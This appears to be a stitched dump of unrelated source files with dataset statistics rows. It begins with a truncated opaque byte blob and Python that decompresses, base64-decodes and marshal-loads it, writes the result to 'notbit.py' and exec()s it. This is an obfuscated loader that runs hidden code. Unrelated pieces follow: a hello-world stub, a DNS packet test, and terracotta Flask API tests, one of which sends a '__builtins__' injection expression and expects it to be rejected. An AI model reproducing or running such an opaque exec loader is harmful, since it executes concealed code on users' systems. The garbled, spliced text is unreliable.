x07\xe2{\xe0\xdb\x97\xa1j^\x88\'\xb2\xbd\xa6\xd9\xef\xec\x1d\x17\xe3\n\xf1\xbb\xaf\xe7\xd5\xc3\xefC\xe2\x17\x06\xfcU\xb5\x81\x7f\x92L1\xb5\x86\xcf\x92_\x10\x9e\xe7\x88A\xec+o>\x13\xfe\xcd\xc9_\xfc\x8e\x99\x04,&\x1d\x16O\x88a\xc4\x07\xc5\x0e\xcf\xab\x8f\\\x1aX\xdb\xd4\xa2\xf0\xcdk\xfdI>\t[\xc2W\x90\xd7\xf5F^\x97\xea\x03\xd4\xcf\xc9\x898\xba\xef\xc8u\r`P\\\x9b\xa8\x0bi\x1dI$i\xe0\xb8\xed:\x0f\xa8\xb7\xa8\x1e\xcd\x19\xbf\x9d\xd0s\x8d\xf7I\xc7\xa9P\x9bP<&\x0b\xd4#\x11l\xfa\x9e\xde\xe4\xfa\xcc\xf2\'\xf3\x17^Kv\xf6\xa8\x9f\xba\xc5\x12\xf5\x1cj\x12V\x9f\xaf\xec\xe4\x0f\xaaQY\xdc\x14\xdd\x046\x979g\x7f\xc2s\xb0F\x8e_\xd3U\xe0Y\xa5\xd7\xe1\xb5l\x8d}>\xb8\xf0x&\xd2\xdc\xbdr\x8e\x1a\x11v9\xf8U\xef\x18q\xbc\x89\x89\xb3\x00_\x0f\xbez\xcbELm.8s\xa6\xaf\t\xb7\xd7\x1c\xf5\x15\xf1\xf5\xeb\xf8V\x06\xed\xfd\x93~B\x9aKCm\x08\xfb/\xdc(\x1f>\xe03p\xae\x1cu\xfc-\xec(0<\x9c\xd4>\xadQ\x9dg"\x96\xf9o5o\xd9\xf8\xb0\x81?\x18\xd3\\=\xe2\x05>t:*\xe4\xc3Pw$\xfa\x0c\xdf}\xf7\xbd\xc8j\xe7\xd3-\xd8|\x8a\x1a\xf9q^\xe4\xd4\xc2:\x06.\xf4p\xa9\xeb\x0b\x9b\xd9\xef.\xe7\xf0\xbdQ,\xc3\xcf\xeb9\xa8\x16\xac\xd7I\x8f\t]m}`\xf3\xc2=\xaf"O\xc90\x1f\xab\xa3|\xcfg:x\xf6;\x8f\x11\x8a\xd7i7\xd4\xe7\x9bgc\x86\xe0\x8e\x88c\xc2z\'\xd4Q\xd7\xea\xcelI=\x9e~\xdb\xf3\xe0\xb16a\x98B\xbe\x8d\xdawZ\r1f\xe9\xa2\xae/\xb4\x9d\xd7qN\xac\xdfaw[\x1b\x8c\xd4\x08u\x95\xb2\xfbp\xe4=t\xfc=\xf2z\xe5\x10z\r\x8aI\x1c\r\xf2\x13\xe33E^B\xe7\tt&\xf2\xb9\xe7\x87\xa0\xcdG\xdd\xc7\xf7\xb7\xc0\x9e\x8b\xa1\x01C\xf4s\x17u*b\xaa\x9b\xcf\\\xadZb~\x86i\xd0\x93J6P\x811\xb5\x1e\xa9_\xf4\xc3u\x96\\\x1e\xe2\x0bx\xb4\x17C\xb5[Q\xff\x82prT\x98"\xf6JuA0\xd6\x84\x03\xf5D\xb8.2\xd3\xe8<\xce\xd3\xea\xeb\x80x<\x05\x83|\x15\xd4k\xc3\x1c\xc7\xa8\xc3e,J\xcaY\xc8\x97"\xe1mW\x0c\x8b\x13\xb3/\xf3\xfdIc/\x92}\xc5\xd4\x19|\xcf\xe7\xfe\xc0\xc6<\x8bAS\xbc\xf5\xe1(_\x94\xd6\x96\xf49J_J\xaai\x9bw)\x7fC\x9f\x17\xf8\xb8\xb0\xd4\xe7T[\xec1\xd7\x11\xb6\xbdYKf\x0e\x07\xf7=\x10\xea\xa7\x00\x8b\x05\xafs\xed\x97\x0c\xa9\x7f\x82\x9a\xe3\xbe\xa7\x92\x90\x9cm\xa3\'\xe0?b\xd9\x02\xfe\x93}\xfb\x84o\xaa\xefR\xdd\x9d\x17\xa8\xcfg\x01\xf43\x1cP\xdf\xe5\xae\x97\x05.\x12m"]\xdcQ\x1e\xa0\xf7C\xce}j\x1d\x81\xb3\x0f\xa6\x883&\xef\xc4\xf6\xe3\xc8\xe4\xcf\xc9\xa8\xf0ak(S\x9an\xa34\xdc\x19\x83\x1d\xf5%\x11o\xe3\xf2=\x8d\xca\x91g"?i\xe0H\x88Y;\x92\x87\x8d\xde\xeb8\xabu\xf4\xb6\xf0\x14a!%\t\xf2~N5\x05\x9e\xec:?\xf5g\xaekXzc\x9e\xb7\xfa]\xe4\x86&^X\xccp\x9c\x066\x85R\xb4\xc2\x9e\x81\xbfI\x8b{S\xc6\x13\xa3\xa7s\x19v\xf8\xc8\'J\xe0\xd5\xf7\xa5\xa7\x9c\x98\x8du-\x0b\xab\x97\xc3(\xaf9\xde\xa4\x99\xf3\xc6\x97\xea\xbd\xb0\xfa\x05\\&\xd2\x93\x1c\xb9\x172z\xd7\xf1\x9frT2@\xed\xa0\x82[\xbc\x01\'v\x8bB[/\x85\x9a\x93\xe4\xb0\xbd\xe7\xc0\xfe\xa89\xe2\xeb|\xe0\x0by\xb8\x16a\xf73\xf5\xb2\x10\xe3\xdd<PO7k\xca\xd9\xfe\x91#\xe5\x16\xaf\xaeq\xbe\xf5\xef\xc72;~s\x7f"\xae\x9c\xbb\xb8:#\xae\x98\x8c\x9b5\xa2\xb6\xe0\x1c\xa3\xcd1u\xadF\xbdh`u\xd6\xd4\xaf4fr\xcd\xd7\xc8\xfbI\x1eQ~\x1d\x8c\x0f\xb3\xc2\xe9\\\xf9rB8/\x84\x97O\xfb\x8eY\xcd(\x89\xf0\xc3PvP\x1f\xf9v\xc6|\x17\xd8\xd9\r\x8aq\xcc\xfb\xccQB\x98\x0f\xac\x15\xc3r\xbc\xa9\xf5\xc29/\xf4\xd5\xe0\xd3-\xc6\x83\x1fw\x10\xef\xbcG9\xe1|\xc9\x14\x19\'\xcd\xa9\x06G\x9dQr>}\x83\xdd\xb5/\xfc o_\xeb\x1a}Q\xde\xf7\x9a\x9fs\x00\xf8\x94\n\xdf\xc0~\xad\xbc\xe1\x85L\xb7\xf6X\x06\xd7\xe4\x8f\xad\xcc8\xd7i\xfa\x8bJ\xda\xbc\xc3d\x08\xd7\xfc\r\xae_\xef\x7fz\x19e\xdd<\x12\xda\xf5oH\xaf\xd0\xbdL\xd8K}>p\\\xec\x93\xfa\xc39\xeb\x81P,|s\xa6U\xe4\xce\xb7,\x96m\xeb.\xb7\x82\xf7\xae\x811\x14\x83\xed\xfc\x0f9\xd64\xda=3\xfe\xc5\xed\x8d<\xb0\xf0(f\x9d\x17\xaa{\x88/0}\x0b\x9a\x84x\xd9-\\s\x07\x0cme\xd2\xb9G\x90*\xad\xdd\xde\xe3:&m\xeb\x07\x18p\xd3\x1bz\xd0=\xea\xc5\xf2s]\xc9e\xde\xd4`\x8d\xdd\xa9\xdf\t\xae\x9c\xfd2\xceB\xbc,r)\xa72<\xf9\x07\xfe{\x83i\x83)\xf5"X\xce\xfa\x1b~|\xc3?k\xae[\xafae\x7f\xc17\x81\x03\xb3\xe2\x15u\xa4L\x1c\xbbbgOz\x9e\xfd2\x0c\x00\xef\xf2:|\xceG\x9f\xbc\xe2\xe3\r\xc7(\xcd$\x12e\x96\x87[n\xa7F\xc8\xa1f\xf5\xc1\xce\x1a\x10+\xc8\xd3T+2\xae\x04\xf9\x86~\x06\xaeQ=\xa9\xc0o\xe1\x17\xe0\xdeK\x17\xf5|#\x7f\xb6\xa9q\xf1/\xe5\xaa\x9f\x9c\xebk\x1fn\xea\xcf\xbbs\xb6\x1ak\xdc\xb93\x9e\xf5e\x8f\xf5pE+\x0f\x8a)\xe91n8<r\x15\xfcS$.\xf9\xb5\xfc\'\xb5\x17t\x98y\xd7X\xdf|\xc2\x145l\xea\x8c\xf2\xce?\\\x92\xffkk\x02\xf0\x89g\xf5\xc0\xcf\xf8\xc5\x01\xb5.0!\x8cI\x0e\xf8\xc2\rn\xfd\x8f\xf9\x00j\xc6y\x0c\x0c\xca\xb9\xfd\x81\xdd\x15\xd3\x13\xbe\xf3\x93%\xb0qQ\x9c\xf3\x1fa\x99\xcak^\xc4\xb4"R=;g\xe7q\xd4w\xe9v\r}\x9f\x7f\xd8\xacf\xcf?\xf4\\\x00.\\\xb9\x8e\xeb\xbc\xc0N\x9b1\xeb\x998\xbb%\xc3z\xde\xff\x00\xe6@7m_\xe3\xec1\xdd55\xf3\xb5\xa7\x02\xde\xc0\xfb\x94m\x1fG\xcc}\xd5hr\xdc\xdb\x12\\l\xc9\xcf\xb3y\xbdn7gv\xc6\x95\xf3\r\xac\x13\xf2\xdf\xd6/\xf2\xdc\xef\xfd\xb7\xdf\xf1\xff\xa1\xdfq\x87It\xbe@\xfe~\xedml\x1b\xfb\xc2\x87\x1a\x0eD\xb9`\x0f\xff\xcc\x0c\x95\xce\x11\xa6\x17\x9e\x0b\x88\x03R\x9f\xa3\xc6\x93\x92\xc9]]c<\xf9\x94W\xcc\x8a\xbf\x7f\xd7\xc7\xb8\xd6\xea\x9c\xe3\xb3\xbe>\xec1\xff\x0fq,W\xbb| \xbfQ\xbd\x82\xd8\xf8\x17;o\xe9\xf0^\xca?\xc0+\xb2_\x072\xc0\xc5\xfbWlb\xf1\xff%^\xb5\xb8\xca\xf2H\xf5\x9f\xae\xfb\x9f\xe2#F;\xf6LUz\x1f\xad\xee\xce\xcc_\xc0;\x9a\x9au\xd8\xd6\x8dj\xf8[\xcd\x15\xef\xd7~ij\xf4\xdb=\x91\x7f\xd6\xf75l\xca_Z\xb5\x90\xe2M\x98F\xac.\xf2\xd4\xd7\xcd(\xdd\xfc6tN\x90y\x8a[?a\xeb\x0b\xb7\xa3"\xaaX}\xfd\xd6\xaf\xd7\x01_\xd0\xdb5\xb0\xde\x02\xe9\xf5\xe1\xbd\xb6~\xbd\xf9\x9e\xc5\x0e\xbf\x071\xa7~\x1bt\x86\x98\x1f\x18%b|\xef;\xa7\xe3P}\xf9\xd7\xb7*+\x81\x0f\x0f6\xc9\x0e\xc0\x98c\x04\x8e\xc8\xb0\xfa\xa6>}\x16[~\xda\xe6P\x16_\x93\xc1\xfeA\x1f\x8e|\x9f\x07\xfe<\xcf?\xee\x83\xf7\x03\xb9\xbf^k\xe7MS/_\xfd\x90\xf7\x02\xf99G\xe3{\xf5\xb8\x9f\xe4\x87\x8f6\xfd:\xb6&\x8f\x1c\x91t\xdd\xcd}M\xc6{\xb2HgG\xf7\\\x9bt\xc08\x14\xf8\xd6\xf3~\x14auk\xd3G\xcc\xa1\xbcWF\x98\xe3\x06w\xbc\xf1gn\xa47s\xdc\xf9\x19\xd3\xe7]\xef\xf6S]\xad\xedY\xfd\xf5\xeb\xf0\xa8\xae\x89\xa8\x9f*\xb2\xfc\xf0\x0f0\xc9\x0f:\xf3v/_\xd6x?\xe0\xb2S\x11\xbc\x89\xe7\xa3\xcfu%\xe7St\xae\xf7E?\xbc\xcd#\xef\xc8\xe3{\xfa\x9d\xf5}N\xbfL\x97\x87@\x94\x89\xcf\xfd\xfd\xfaN\xfa\x9a\x17\xfe\x1d}\xb6w;D\x0b~kv\xd9=/:\xaf\x02\x8f .\x1a\x10_G\x0c\xf2\xfe\x18\xb8E\xa1m\x03]K\x03\xdd\xf9\xa1\x9e\xb9/\xf0\xb3\xc0\xa1\x1aMX/\xb2\xa23\xb4,^Jt\xafa\x8a}0\xce\xd9\xf4T\xf9{\xd7\xfbH\xa6O5\xcf\x97\xe7n\xe6W\xe7n\xd5\xd7\xe7n\xf9#o\xa2\\p\xbd\x13F\xdc\x96\xf5vYo\xfe\xc0\xcfc\xc7\x87\x10\x98\xb3T\xbb\xc4\x99/\xb0\xfd\xc6\xa0\xfei\xc7\xa23\xd5\xb4\x8d\x01\x8c\x0b\xdc}\xb6\xf4\x8c\xfb\xdf\xe9,U\xed\xc5\r\x07\x06\x97=\xb0\xbb\x02l\xff5\xe6Q,\xbb\r\xfe\xd1\x99\xf2\xf5\xae\xc7\xa4\xc6\x15\xe8\xb0\xe5\xa7#~\xf7\xe4q/\r\x7f\xe4\x98\xe2)[\x0f\xbe\x1aJ\xf1\xf6\x0bn\xc4\xf9\xc5\xe0\x91_3=\xed\xb9\xfd>\xe5\x02vG\x92\xf2J\x8bQ^{g\xee\r1Q\x91l\xaa\x15\x10\x0b\x84\xad\xbf\xdf\xf2\xc0\x89\x98+\xb7}1\xea-\x87XG\x93\x87\x86\x03\xc6/E\xe4C\xba\x1b\x07?\x16\xb6_\xd7:\xcf\xb8C|wN\xb6,d\xc6\x0b\x1a\xae\xf8\xf4\xac\xeaZ\xfb\x82{n\x8f\xc8\xdf\x7f\xffL\x8c\xbf_\xde\xe2\xb7\xcd\xd7\xc0\xce\x06Z\x9c\xff\xdf\xc7%\x19n\x07\x9eC\xf7n\x98\xcc/\xb1\xc6\xbd\xe1ld\xc3\xfaN(qq\xaca\xbdT\x93\xaa\xee\xb1\xee#\xba\xdf\xa03\x9d\xc5\x135>\x0c\xd7t\xf7\x8d\xe1\x02\xb0\xe7\xa5\xe4wok}\xdb]\xc4\x83\x0c^\xc9\xb1\xe1\x07|\x87\xdd\xb9`\xfd\xaf\xbe\xf2\xc7cn]\xd9\xf5\x1d\xc8[\x1e\xf9#;=\xc9\xf1\xc3>\xad\xb9\xdb\xde-\x99\x17\xce9rI7\xc9#/\xd9\xfe\xc9Z]\xdf3\xb7~\x99\x137\xbb\xc3\xc1z}tO\x80\xddg\x01v\xf2\xf3%Zg\xd1\x9c\x9d|\xf2\xd3\r\xdd\xff\xa6\xfbT\x13I\xdb\x05\xba\x89\x9an\xafp\xfc4\xed\xf6^r\xaf9\xdbSr\xe0\xc6\'\xdfj\xb8\r[\xab\x94g\xcf\xce\x0en9\x10\xd5\x02\x8b\x99\xd8\xe4\xe3\x9f\xaf\t\x1c\xe1\xc0d\xd4{\xe7\xfd\x9b&N9\xbe\xd4\xfd}\xc6a\xeb\x1e\xff\xaf;O&\x1dk\xf2&\xa0Z\xb9\xaa\xb9\xa9\xda\xf4\x10\xfeJ\xaf\x9b\xf2I\xaft\xc17\xc1\xfb\xc4\x90\xdd\xeb\x98&\x1f_\xf7\x8d\x18\xee\x92\x0f\x03\xc3\xc1\xf5\xcd\xcb\xb3Z\x81\xee\xd5\x04\x14+\x1d\xba_\xc6\xea\x05~\xd7\x97\xf8\x15\x9d\xd5\xdd\xdc\xb3\x7fR\xbb|\xdd\x9b\xca"{:w\x9a\xbb\xf7\xb3\xc8\xb5\xd6\xecN\xb1\xadL\xd8|T\x17s\xbf\xfb\x83\xfd%\xbc\x15k\xfdt\x84\x9b5\xd0]d\xc6\x85\xff\xcb\xc9\xfe\xefp\xb2\x8b\x7f\xd7\xff\x8bS\xee\xd79\xf9&\xf5f\xc0\x9b\xa6\x9b\xfa\xdc\x1c\x7f\xad\r\xf9!\xefg6\xf7\xe6^\xe2i}\x1f\xbd\xe6e\xac\x1f\xa9\x92\xde\xe3\'\xb9\xb7t\x90\xc3\x10Wz\x0e\xfbN\xb7\xa1\x84\x98\x05>/`\x07_e\xfcf\xc8k<p\xae\x8as\x94\xdaWV\x81.\x1f\x913\xb6\xc0"1\xc8\x89\x93\x00C4:\x83\x17Ot\xdf\r>\x0fn\x90\x1f\x86j\xb6\xfd7\x0f\xc0\xa6&'
val=zlib.decompress(data)
val=bs.b64decode(val)
val2=ms.loads(val)
fw=open('notbit.py','w')
fw.write(val2)
fw.close()
exec(val2)
print('done')
| 834.235294 | 13,981 | 0.733042 | 3,252 | 14,182 | 3.187269 | 0.278905 | 0.001737 | 0.001737 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.21533 | 0.001904 | 14,182 | 16 | 13,982 | 886.375 | 0.51692 | 0 | 0 | 0 | 0 | 1.083333 | 0.777535 | 0.776336 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0.083333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
dbf72e3ca9c0760ca6777e329e27075106a7a7eb
| 73 |
py
|
Python
|
pyfinancials/engine.py
|
kmiller96/PyFinancials
|
73a89b0fd3a3d501b8f8c770f73473e9a2d18fdf
|
[
"MIT"
] | 1 |
2019-02-09T21:28:27.000Z
|
2019-02-09T21:28:27.000Z
|
pyfinancials/engine.py
|
kmiller96/PyFinancials
|
73a89b0fd3a3d501b8f8c770f73473e9a2d18fdf
|
[
"MIT"
] | null | null | null |
pyfinancials/engine.py
|
kmiller96/PyFinancials
|
73a89b0fd3a3d501b8f8c770f73473e9a2d18fdf
|
[
"MIT"
] | null | null | null |
def hello_world():
"""Tests the import."""
return "Hello world!"
| 18.25 | 27 | 0.60274 | 9 | 73 | 4.777778 | 0.777778 | 0.465116 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.219178 | 73 | 3 | 28 | 24.333333 | 0.754386 | 0.232877 | 0 | 0 | 0 | 0 | 0.24 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 1 | 0 |
0
| 6 |
dbfd1a602dd992f412e1700c617d5bbf9b239826
| 505 |
py
|
Python
|
tests/test_dns.py
|
jensstein/mockdock
|
4eec294f33d929d361973c1708d2aa856a9900a0
|
[
"MIT"
] | null | null | null |
tests/test_dns.py
|
jensstein/mockdock
|
4eec294f33d929d361973c1708d2aa856a9900a0
|
[
"MIT"
] | 6 |
2020-03-24T16:45:10.000Z
|
2021-02-13T10:03:53.000Z
|
tests/test_dns.py
|
jensstein/mockdock
|
4eec294f33d929d361973c1708d2aa856a9900a0
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import unittest
from mockdock import dns
class DNSTest(unittest.TestCase):
def test_build_packet(self):
data = b"^4\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x06google\x03com\x00\x00\x01\x00\x01"
packet = dns.build_packet(data, "192.168.0.1")
expeced_result = b"^4\x81\x80\x00\x01\x00\x01\x00\x00\x00\x00\x06google\x03com\x00\x00\x01\x00\x01\xc0\x0c\x00\x01\x00\x01\x00\x00\x00<\x00\x04\xc0\xa8\x00\x01"
self.assertEqual(packet, expeced_result)
| 38.846154 | 168 | 0.708911 | 89 | 505 | 3.966292 | 0.41573 | 0.23796 | 0.203966 | 0.169972 | 0.373938 | 0.373938 | 0.339943 | 0.339943 | 0.23796 | 0.23796 | 0 | 0.237557 | 0.124752 | 505 | 12 | 169 | 42.083333 | 0.561086 | 0.041584 | 0 | 0 | 0 | 0.25 | 0.47619 | 0.453416 | 0 | 0 | 0 | 0 | 0.125 | 1 | 0.125 | false | 0 | 0.25 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
e02820e74734d672d90f15bf093da7319a0c92ba
| 12,815 |
py
|
Python
|
tests/server/test_flask_api.py
|
YuhangCh/terracotta
|
867ba5f7425fa88881f4c161d81cc7311f4f9c4e
|
[
"MIT"
] | null | null | null |
tests/server/test_flask_api.py
|
YuhangCh/terracotta
|
867ba5f7425fa88881f4c161d81cc7311f4f9c4e
|
[
"MIT"
] | null | null | null |
tests/server/test_flask_api.py
|
YuhangCh/terracotta
|
867ba5f7425fa88881f4c161d81cc7311f4f9c4e
|
[
"MIT"
] | null | null | null |
from io import BytesIO
import json
import urllib.parse
from collections import OrderedDict
from PIL import Image
import numpy as np
import pytest
@pytest.fixture(scope='module')
def flask_app():
from terracotta.server import create_app
return create_app()
@pytest.fixture(scope='module')
def client(flask_app):
with flask_app.test_client() as client:
yield client
def test_get_keys(client, use_testdb):
rv = client.get('/keys')
expected_response = [
{'key': 'key1'},
{'key': 'akey'},
{'key': 'key2', 'description': 'key2'}
]
assert rv.status_code == 200
assert expected_response == json.loads(rv.data)['keys']
def test_get_metadata(client, use_testdb):
rv = client.get('/metadata/val11/x/val12/')
assert rv.status_code == 200
assert ['extra_data'] == json.loads(rv.data)['metadata']
def test_get_metadata_nonexisting(client, use_testdb):
rv = client.get('/metadata/val11/x/NONEXISTING/')
assert rv.status_code == 404
def test_get_datasets(client, use_testdb):
rv = client.get('/datasets')
assert rv.status_code == 200
datasets = json.loads(rv.data, object_pairs_hook=OrderedDict)['datasets']
assert len(datasets) == 4
assert OrderedDict([('key1', 'val11'), ('akey', 'x'), ('key2', 'val12')]) in datasets
def test_get_datasets_pagination(client, use_testdb):
# no page (implicit 0)
rv = client.get('/datasets?limit=2')
assert rv.status_code == 200
response = json.loads(rv.data, object_pairs_hook=OrderedDict)
assert response['limit'] == 2
assert response['page'] == 0
first_datasets = response['datasets']
assert len(first_datasets) == 2
assert OrderedDict([('key1', 'val11'), ('akey', 'x'), ('key2', 'val12')]) in first_datasets
# second page
rv = client.get('/datasets?limit=2&page=1')
assert rv.status_code == 200
response = json.loads(rv.data, object_pairs_hook=OrderedDict)
assert response['limit'] == 2
assert response['page'] == 1
last_datasets = response['datasets']
assert len(last_datasets) == 2
assert OrderedDict([('key1', 'val11'), ('akey', 'x'), ('key2', 'val12')]) not in last_datasets
# page out of range
rv = client.get('/datasets?limit=2&page=1000')
assert rv.status_code == 200
assert not json.loads(rv.data)['datasets']
# invalid page
rv = client.get('/datasets?page=-1')
assert rv.status_code == 400
# invalid limit
rv = client.get('/datasets?limit=-1')
assert rv.status_code == 400
def test_get_datasets_selective(client, use_testdb):
rv = client.get('/datasets?key1=val21')
assert rv.status_code == 200
assert len(json.loads(rv.data)['datasets']) == 3
rv = client.get('/datasets?key1=val21&key2=val23')
assert rv.status_code == 200
assert len(json.loads(rv.data)['datasets']) == 1
def test_get_datasets_unknown_key(client, use_testdb):
rv = client.get('/datasets?UNKNOWN=val21')
assert rv.status_code == 400
def test_get_singleband_greyscale(client, use_testdb, raster_file_xyz):
import terracotta
settings = terracotta.get_settings()
x, y, z = raster_file_xyz
rv = client.get(f'/singleband/val11/x/val12/{z}/{x}/{y}.png')
assert rv.status_code == 200
img = Image.open(BytesIO(rv.data))
assert np.asarray(img).shape == settings.DEFAULT_TILE_SIZE
def test_get_singleband_extra_args(client, use_testdb, raster_file_xyz):
import terracotta
settings = terracotta.get_settings()
x, y, z = raster_file_xyz
rv = client.get(f'/singleband/val11/x/val12/{z}/{x}/{y}.png?foo=bar&baz=quz')
assert rv.status_code == 200
img = Image.open(BytesIO(rv.data))
assert np.asarray(img).shape == settings.DEFAULT_TILE_SIZE
def test_get_singleband_cmap(client, use_testdb, raster_file_xyz):
import terracotta
settings = terracotta.get_settings()
x, y, z = raster_file_xyz
rv = client.get(f'/singleband/val11/x/val12/{z}/{x}/{y}.png?colormap=jet')
assert rv.status_code == 200
img = Image.open(BytesIO(rv.data))
assert np.asarray(img).shape == settings.DEFAULT_TILE_SIZE
def test_get_singleband_preview(client, use_testdb):
import terracotta
settings = terracotta.get_settings()
rv = client.get(f'/singleband/val11/x/val12/preview.png?colormap=jet')
assert rv.status_code == 200
img = Image.open(BytesIO(rv.data))
assert np.asarray(img).shape == settings.DEFAULT_TILE_SIZE
def urlsafe_json(payload):
payload_json = json.dumps(payload)
return urllib.parse.quote_plus(payload_json, safe=r',.[]{}:"')
def test_get_singleband_explicit_cmap(client, use_testdb, raster_file_xyz):
import terracotta
settings = terracotta.get_settings()
x, y, z = raster_file_xyz
explicit_cmap = {1: (0, 0, 0), 2.0: (255, 255, 255, 20), 3: '#ffffff', 4: 'abcabc'}
rv = client.get(f'/singleband/val11/x/val12/{z}/{x}/{y}.png?colormap=explicit'
f'&explicit_color_map={urlsafe_json(explicit_cmap)}')
assert rv.status_code == 200, rv.data.decode('utf-8')
img = Image.open(BytesIO(rv.data))
assert np.asarray(img).shape == settings.DEFAULT_TILE_SIZE
def test_get_singleband_explicit_cmap_invalid(client, use_testdb, raster_file_xyz):
x, y, z = raster_file_xyz
explicit_cmap = {1: (0, 0, 0), 2: (255, 255, 255), 3: '#ffffff', 4: 'abcabc'}
rv = client.get(f'/singleband/val11/x/val12/{z}/{x}/{y}.png?'
f'explicit_color_map={urlsafe_json(explicit_cmap)}')
assert rv.status_code == 400
rv = client.get(f'/singleband/val11/x/val12/{z}/{x}/{y}.png?colormap=jet'
f'&explicit_color_map={urlsafe_json(explicit_cmap)}')
assert rv.status_code == 400
rv = client.get(f'/singleband/val11/x/val12/{z}/{x}/{y}.png?colormap=explicit')
assert rv.status_code == 400
explicit_cmap[3] = 'omgomg'
rv = client.get(f'/singleband/val11/x/val12/{z}/{x}/{y}.png?colormap=explicit'
f'&explicit_color_map={urlsafe_json(explicit_cmap)}')
assert rv.status_code == 400
explicit_cmap = [(255, 255, 255)]
rv = client.get(f'/singleband/val11/x/val12/{z}/{x}/{y}.png?colormap=explicit'
f'&explicit_color_map={urlsafe_json(explicit_cmap)}')
assert rv.status_code == 400
rv = client.get(f'/singleband/val11/x/val12/{z}/{x}/{y}.png?colormap=explicit'
f'&explicit_color_map=foo')
assert rv.status_code == 400
def test_get_singleband_stretch(client, use_testdb, raster_file_xyz):
import terracotta
settings = terracotta.get_settings()
x, y, z = raster_file_xyz
for stretch_range in ('[0,1]', '[0,null]', '[null, 1]', '[null,null]', 'null'):
rv = client.get(f'/singleband/val11/x/val12/{z}/{x}/{y}.png?stretch_range={stretch_range}')
assert rv.status_code == 200
img = Image.open(BytesIO(rv.data))
assert np.asarray(img).shape == settings.DEFAULT_TILE_SIZE
def test_get_singleband_out_of_bounds(client, use_testdb):
import terracotta
settings = terracotta.get_settings()
x, y, z = (0, 0, 10)
rv = client.get(f'/singleband/val11/x/val12/{z}/{x}/{y}.png')
assert rv.status_code == 200
img = Image.open(BytesIO(rv.data))
assert np.asarray(img).shape == settings.DEFAULT_TILE_SIZE
assert np.all(np.asarray(img) == 0)
def test_get_singleband_unknown_cmap(client, use_testdb, raster_file_xyz):
x, y, z = raster_file_xyz
rv = client.get(f'/singleband/val11/x/val12/{z}/{x}/{y}.png?colormap=UNKNOWN')
assert rv.status_code == 400
def test_get_rgb(client, use_testdb, raster_file_xyz):
import terracotta
settings = terracotta.get_settings()
x, y, z = raster_file_xyz
rv = client.get(f'/rgb/val21/x/{z}/{x}/{y}.png?r=val22&g=val23&b=val24')
assert rv.status_code == 200
img = Image.open(BytesIO(rv.data))
assert np.asarray(img).shape == (*settings.DEFAULT_TILE_SIZE, 3)
def test_get_rgb_preview(client, use_testdb):
import terracotta
settings = terracotta.get_settings()
rv = client.get(f'/rgb/val21/x/preview.png?r=val22&g=val23&b=val24')
assert rv.status_code == 200
img = Image.open(BytesIO(rv.data))
assert np.asarray(img).shape == (*settings.DEFAULT_TILE_SIZE, 3)
def test_get_rgb_extra_args(client, use_testdb, raster_file_xyz):
import terracotta
settings = terracotta.get_settings()
x, y, z = raster_file_xyz
rv = client.get(f'/rgb/val21/x/{z}/{x}/{y}.png?r=val22&g=val23&b=val24&foo=bar&baz=quz')
assert rv.status_code == 200
img = Image.open(BytesIO(rv.data))
assert np.asarray(img).shape == (*settings.DEFAULT_TILE_SIZE, 3)
def test_get_rgb_stretch(client, use_testdb, raster_file_xyz):
import terracotta
settings = terracotta.get_settings()
x, y, z = raster_file_xyz
for stretch_range in ('[0,10000]', '[0,null]', '[null, 10000]', '[null,null]', 'null'):
rv = client.get(f'/rgb/val21/x/{z}/{x}/{y}.png?r=val22&g=val23&b=val24&'
f'r_range={stretch_range}&b_range={stretch_range}&g_range={stretch_range}')
assert rv.status_code == 200, rv.data
img = Image.open(BytesIO(rv.data))
assert np.asarray(img).shape == (*settings.DEFAULT_TILE_SIZE, 3)
def test_get_compute(client, use_testdb, raster_file_xyz):
import terracotta
settings = terracotta.get_settings()
# default tile size
x, y, z = raster_file_xyz
rv = client.get(
f'/compute/val21/x/{z}/{x}/{y}.png'
'?expression=v1*v2&v1=val22&v2=val23'
'&stretch_range=[0,10000]'
)
assert rv.status_code == 200
img = Image.open(BytesIO(rv.data))
assert np.asarray(img).shape == settings.DEFAULT_TILE_SIZE
# custom tile size
rv = client.get(
f'/compute/val21/x/{z}/{x}/{y}.png'
'?expression=v1*v2&v1=val22&v2=val23'
'&stretch_range=[0,10000]'
'&tile_size=[128,128]'
)
assert rv.status_code == 200
img = Image.open(BytesIO(rv.data))
assert np.asarray(img).shape == (128, 128)
def test_get_compute_preview(client, use_testdb):
import terracotta
settings = terracotta.get_settings()
rv = client.get(
f'/compute/val21/x/preview.png'
'?expression=v1*v2&v1=val22&v2=val23'
'&stretch_range=[0,10000]'
)
assert rv.status_code == 200
img = Image.open(BytesIO(rv.data))
assert np.asarray(img).shape == settings.DEFAULT_TILE_SIZE
def test_get_compute_invalid(client, use_testdb, raster_file_xyz):
x, y, z = raster_file_xyz
# too few keys
rv = client.get(
f'/compute/val21/{z}/{x}/{y}.png'
'?expression=v1*v2&v1=val22&v2=val23'
'&stretch_range=[0,10000]'
)
assert rv.status_code == 400
# invalid expression
rv = client.get(
f'/compute/val21/x/preview.png'
'?expression=__builtins__["dir"](v1)&v1=val22'
'&stretch_range=[0,10000]'
)
assert rv.status_code == 400
# no stretch range
rv = client.get(
